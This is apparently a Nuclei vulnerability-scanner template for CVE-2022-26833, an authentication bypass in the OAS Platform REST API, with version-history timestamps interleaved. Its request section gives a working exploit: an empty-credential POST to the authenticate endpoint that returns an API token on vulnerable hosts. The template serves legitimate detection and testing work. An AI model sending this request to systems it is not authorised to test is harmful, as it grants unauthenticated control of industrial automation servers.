2022-09-03 02:15:54 +00:00
id : CVE-2022-26833
info :
2023-03-21 05:55:04 +00:00
name : Open Automation Software OAS Platform V16.00.0121 - Missing Authentication
2022-09-03 02:15:54 +00:00
author : true13
severity : critical
description : |
2023-03-21 05:55:04 +00:00
An improper authentication vulnerability exists in the REST API functionality of Open Automation Software OAS Platform V16.00.0121. A specially-crafted series of HTTP requests can lead to unauthenticated use of the REST API. An attacker can send a series of HTTP requests to trigger this vulnerability.
2022-09-03 02:15:54 +00:00
reference :
- https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1513
- https://nvd.nist.gov/vuln/detail/CVE-2022-26833
2023-03-21 06:26:30 +00:00
- https://talosintelligence.com/vulnerability_reports/TALOS-2022-1513
2022-09-03 02:15:54 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2022-26833
2023-03-21 05:55:04 +00:00
tags : cve,cve2022,oas,oss,unauth
2022-09-03 02:15:54 +00:00
requests :
- raw :
- |
POST /OASREST/v2/authenticate HTTP/1.1
2023-02-02 11:42:55 +00:00
Host : {{Hostname}}
2022-09-03 02:15:54 +00:00
Accept-Encoding : gzip, deflate
2023-03-21 05:55:04 +00:00
Accept : */*
2022-09-03 02:15:54 +00:00
Connection : keep-alive
Content-Type : application/json
2023-03-21 05:55:04 +00:00
2022-09-03 02:15:54 +00:00
{"username": "", "password": "" }
matchers-condition : and
matchers :
- type : word
part : body
words :
2023-03-21 05:55:04 +00:00
- '"status":'
- '"data":'
- '"token":'
- '"clientid":'
2023-02-02 11:42:55 +00:00
condition : and
2022-09-03 02:15:54 +00:00
2023-03-21 05:55:04 +00:00
- type : word
part : header
words :
- "application/json"
2023-03-21 05:59:25 +00:00
2023-02-02 11:42:55 +00:00
- type : status
status :
- 200